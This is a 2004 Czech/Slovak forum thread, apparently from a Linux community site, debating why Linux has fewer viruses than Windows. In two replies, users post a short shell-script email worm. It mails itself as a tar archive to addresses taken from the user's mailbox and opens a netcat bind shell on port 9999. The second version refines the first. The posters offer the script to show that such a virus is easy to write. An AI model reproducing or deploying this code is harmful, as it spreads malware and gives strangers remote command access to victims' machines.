M$ vs Linux

Podle meho nazoru se jedna o dalsi kampan, kdy M$ necha od nejake 'nezavisle' firmy zhotovit studii, ze ktere vypliva, ze WIN je nejlepsi OS nasvete. A pokud se budete zajimat o podrobnosti, zjistite, ze studie byla provrdena ne zas tak nezavislou firmou a vychazi z podminek, ktere nejsou zas tak obvykle (napr. aktualizace kazdych 10 vterin ... to jsem trochu rozvedl do extremu).

31.7.2004 22:59 svaca | skóre: 38
Rozbalit Rozbalit vše Re: M$ vs Linux

No nevim chlapi .....

Davanim Windows dohromady se zivim (bohuzel) a ten system vylozene nesnasim ....

Ale k problemu, jednu vec nechapu,treba vysvetlite ....

Proc je linux mene napadany ??? Vetsinou se pisi viry, co chytnou uzivatele Win a ti je siri a pak jsou utoky na MS servery a tak ....

Ale treba linux neni napadany, protoze neni komercni a ma ho min. koncovych uzivatelu.....

Na win je atak za atakem a vir za virem, to se tezko brani, kor kdyz je totak hloupy system, ale jak by obstal linux, kdyz by byl ve stejne pozici jako Windows.. ?????

Podobna situace je ve browserech, vetsina tech skriptovych viru a jinych svinaren je psana pro Explorer, protoze ho ma kazdy, ale co kdyby byl psan pro mozillu ???

Never give up ! Stay ATARI !

1.8.2004 00:12 Hovadko
Rozbalit Rozbalit vše Re: M$ vs Linux

Ja bych se nad timhle zamyslel ... Neco na tom totiz je ... Tohle by se melo spis prosetrit ... Kdyz uz jsou vselijaky sociologove, politologove, vestkyne z kouli a ostatni tezce placeni statistici - at si spocitaj, jake by to teoreticky bylo, kdyby byl v mainstreamu Linux a ne Window$ ... To by pak bylo myslim si objektivnejsi nez nejaky sponzorovany statistiky ...

1.8.2004 17:30 Valoun | skóre: 30 | blog: Psavec | Středočeský kraj
Rozbalit Rozbalit vše Re: M$ vs Linux

"jake by to teoreticky bylo, kdyby byl v mainstreamu Linux a ne Window$"

Kdyby tato situace nastala, tak by

1.) byl patrne i jiny pomer uzivatelu, kteri jsou schopni rict co se s jejich systemem deje, a umi to ovlivnit/zabezpecit

2.) Do Linuxu by teklo uplne jine mnozstvi penez, objevilo by se vice komercnich firem, vyvoj by patrne vypadal uplne jinak

3.) I nekomercni distribuce by patrne mely nekolikanasobne vice aktivnich uzivatelu, testeru a "bugfixeru"

4.) I autori viru by pracovali jinak. Vzhledem k urcite heterogenite Linuxovych distribuci (a HW platforem nad kterymi bezi), by patrne rostl predevsim spam a viry zalozene na social-angineering

5.) Dost mozna, ze i Microsoft by se zacal chovat jinak

Troufam si tvrdit ze toto odhadovat je mnohem narocnejsi nez detailni predpoved pocasi na 100let dopredu.

1.8.2004 10:37 Petr Šobáň | skóre: 80 | blog: soban | Olomouc
Rozbalit Rozbalit vše Re: M$ vs Linux

Na linux je míň utoků protože:

Na desktopech to není moc rozšířené (hromada uživatelů má ukradené windows - protože jsou na to hry a je to rozšířené)

Na desktopu existují i vyry pro linux ovšem moc se nerozšíří protože uživatelé linuxu jsou o třídu výš a ví co se děje a jak si PC zabespečit. Kdešto uživatelé windows jsou bfu a nainstalují v lepším případě antivir a myslí si že jsou za vodou, když jim něco přijde tak to hned spouštějí misto aby se zamyslely zda to není zase nějaký virus. Kdešto uživatelé linuxu nic bezmyšlenkovitě nespouštějí (spustíte si nějaký program pro linux který vám přijde poštou ? a pokud náhodou chcete vyskoušet co to dělá tak si založíte nějakého usera pokus a skusíte to maximálně tam s omezenýma právy aby to mohlo nadělat co nejméně škody.)

Na serverech si myslím že je situace jiná tam myslím že je situace v napadání stejná, problém je v tom že u linuxu zase sedí podle mě skušenější správci kteří dokáží se lépe proti různým útokům bránit.

1.8.2004 14:00 MSlunečný-sněžný muž | skóre: 7
Rozbalit Rozbalit vše Re: M$ vs Linux

Uživatelé Windows by si měli dávat pozor na zabezpečení, Vám, aniž bych se Vás chtěl nějak dotknout, by neškodil občasný kontakt s pravidly českého pravopisu.

Pokud je tento styl psaní naopak součástí Vaší image (což se v poslední době stalo jakýmsi módním trendem), je to o to smutnější.

I'm trying to find any valuable info on the Internet.However,something is constantly blogging my way

3.11.2004 18:34 Jakub
Rozbalit Rozbalit vše Re: M$ vs Linux

Když už někoho peskujete za špatný pravopis, zameťte si před vlastním prahem. Zájmena jako "ty", "vy", "vám", "vaší" atd. se píšou s malým písmenem. S velkým písmenem, tedy "Tobě", "Vy", "Vám" atd. se to píše pouze v dopisech k vyjádření úcty, serióznějších formalitách/oficialitách, úřední korespondenci apod. Do běžné psané řeči to nepatří. (Což je mimochodem další módní trend - tohle je zřejmě nejrozšířenější nešvar psané češtiny současnosti, často dováděný do absurdních extrémů, jako "aby Ti, kteří mají...", "s Tímto problémem"...).

K tej rozsirenosti. Instalacii linuxu je v dnesnej dobe vela, aj ked to percentualne tak nevyzera. Ak by to mali virusy s linuxom take lahke, uz by sa sirili. Pamatam casy, ked ms-dos malo 5 a pol cloveka a aj tak uz pre to existovali virusy. Podla mna su servery dost chutnym sustom, na to aby sa niekto o nieco podobne nepokusal.

Skor predpokladam, ze sa rozmohnu "podvrhnute" programy pre click-and-run od linspire pripadne z nedoveryhodnych repozitarov pre apt, prip nejake hacknute mirrory so zdrojakmi. Ale virusy ako take tu nebudu. Na to je linux moc heterogenny a lepsie zabezpeceny.Respektive neponuka utocnikom take mocne nastroje specializovane na tvorbu a sirenie virusov.

1.8.2004 21:17 Valoun | skóre: 30 | blog: Psavec | Středočeský kraj
Rozbalit Rozbalit vše Re: M$ vs Linux

Ja bych to tak cerne nevidel. Myslim ze by to mohlo alespon prispet treba k invenci v apt repositarich, jako jsou digitalne podepsane balicky atd. Ja osobne uz ted verim jen originalnimu debian.org, a security updaty taham jen primo od nich. (Ano vim o tom ze i ty byly onehda hacknuty ;-)

O Click-n-Run bych se tolik nebal, prece jenom je ve sprave jedine firmy a od APT repositaru se vyznamne nelisi. Osobne bych rad videl balicky podepsane.

3.11.2004 12:11 doubleZ | skóre: 24 | blog: smazano
Rozbalit Rozbalit vše Re: M$ vs Linux

Ja bych to az zas takto nehrotil ;), spíše když se zamyslíte nad tím jak Linux funguje, dozvíte se hned proč;), většina autorů virů jsou programátoři nanejvýš na vybitou baterii do nefunkčního budíku... nejsou schopni vytvořit virus, který obejde tolik věcí, které před nimi linux chrání. Není pravda, NO FLAME, je to můj objektivní názor, že nejsou lin viry protože je málo linux userů, je dost zlých a sobeckých uživatelů windows, viz mí staří spolužáci, kteří by rádi linuxu dělali naschvály a nadávají na něj jak to jen jde aniž by ho někdy viděli. Napsat virus pro linux je pěkně tvrdý oříšek, navíc čím je user (admin) chytřejší, tím je opět šance jiná. Je velmi snadné psát viry pro win, ale ne pro linux, navíc se těžko píší viry pro nějaké aplikace, sys utility atd, protože každá distribuce má jiné nebo přinejmenším dnes jiné verze a tam se příp. chybky zase neobjeví. Takže by se musely psát viry přímo na konkrétní verzi konkrétni distribuce... nechci prosazovat linux, protože je pro mě nejlepší OS, který používám neustále a všude, píší jen svůj názor... samozřejmě, že člověk, který používá linux, už jen to, že na něj přešel na 100%, vykazje známky vyšši inteligence!!:))) NO FLAME

3.11.2004 15:03 Michal Marek (twofish) | skóre: 55 | blog: { display: blog; } | Praha
Rozbalit Rozbalit vše Re: M$ vs Linux

Napsat virus pro linux je pěkně tvrdý oříšek

Hmm, tohle mi trvalo asi 10 minut...

#!/bin/sh
 
tar czf /tmp/message.tar.gz "$0"
sed -n '/^From:/s/From:.*<\([^>]*\)>.*/\1/p' < $MAIL |\
while read ADDRESS; do
	# tohle by se kdyžtak nahradilo něčím,
	# co nepotřebuje MTA na localhostu
        echo "See attached file" |\
        mutt -a /tmp/message.tar.gz -s message "$ADDRESS"
done
mkfifo /tmp/fifo
while :;do
        nc -lp 9999 </tmp/fifo | sh >/tmp/fifo
done &

Nezkoušel jsem to, ale myslím že současným virům pro Windows by se to vyrovnalo, stačí když se najde dostatek blbečků co to rozbalí a spustí :-/ A získat pak lokálně roota by asi taky nebyl moc velký oříšek.

3.11.2004 15:45 Tomáš | skóre: 31 | blog: Tomik
Rozbalit Rozbalit vše Re: M$ vs Linux

Tohle je spíš social-engineering. Je tam nutná aktivní spolupráce uživatele. Musí to rozbalit, nastavit práva a pak na to klepnout. Kde jsou ty doby, kdy virus odrovnal BIOS a člověk ami nevěděl, jak k tomu přišel!

3.11.2004 16:37 Michal Marek (twofish) | skóre: 55 | blog: { display: blog; } | Praha
Rozbalit Rozbalit vše Re: M$ vs Linux

Když je to v taru, tak žádná práva nastavovat nemusí. A i kdyby, windowsáři jsou schopní spustit vir i v zaheslovaném zipu :-)

3.11.2004 17:43 Hynek (Pichi) Vychodil | skóre: 43 | blog: Pichi | Brno
Rozbalit Rozbalit vše Re: M$ vs Linux

No chvilku mi to trvalo, ale jo. Když by to někomu došlo, tak by musel rozbalit ten tar a kliknout na vysledek, pokud náhodou nemá v nějakém MTA nasatvene, že se mu rozbaleny dokument má hned "otevřít" a "logika" toho MTA by tar s jedním souborem považovala za takový dokument, no a to by ještě ten nějaký MTA ten dokument předhodil standartním mechanizmům nějakého toho "moderního" desktopu (KDE, Gnome) které by se zachovali jak je v jistém nejmenovaném OS a to co vypadá jako spustitelný soubor spustit. No trocha moc předpokladů naráz, ale je fakt, že do těch "moderních" desktopů nevidím a podobně "logicky" chovající se MTA nepoužívám, tak netuším jestli něco takového už někde nečíhá.

Drobná technická: Já bych udělal i tu odesílací část na pozadí:

#!/bin/sh
 
tar czf /tmp/message.tar.gz "$0"
sed -n '/^From:/s/From:.*<\([^>]*\)>.*/\1/p' < $MAIL |\
while read ADDRESS; do
	# tohle by se kdyžtak nahradilo něčím,
	# co nepotřebuje MTA na localhostu
        echo "See attached file" |\
        mutt -a /tmp/message.tar.gz -s message "$ADDRESS"
done &
mkfifo /tmp/fifo
while :;do
        nc -lp 9999 </tmp/fifo | sh >/tmp/fifo
done &

to použití nc je inspirativní :-)

Některé obvlášť logické MTA by mohli třeba rozbalit .gz a když najdou na začátku výsledku #! tak by to mohli iniciativně samy execnout nebo tím pověřit nějaké to "moderní" prostředí. To by pak stačilo přepast řádek s tar na

gzip -c "$0" > /tmp/message.gz

No doufám, že se něčeho takového nedožiju. To je přesně to jak funguje jistá parodie na OS akorát místo #! si dosaďte MZ.

XML je zbytečný, pomalý, nešikovný balast, znovu vynalézané kolo a ještě ke všemu šišaté, těžké a kýčovitě pomalované.

Dotaz: M$ vs Linux

Odpovědi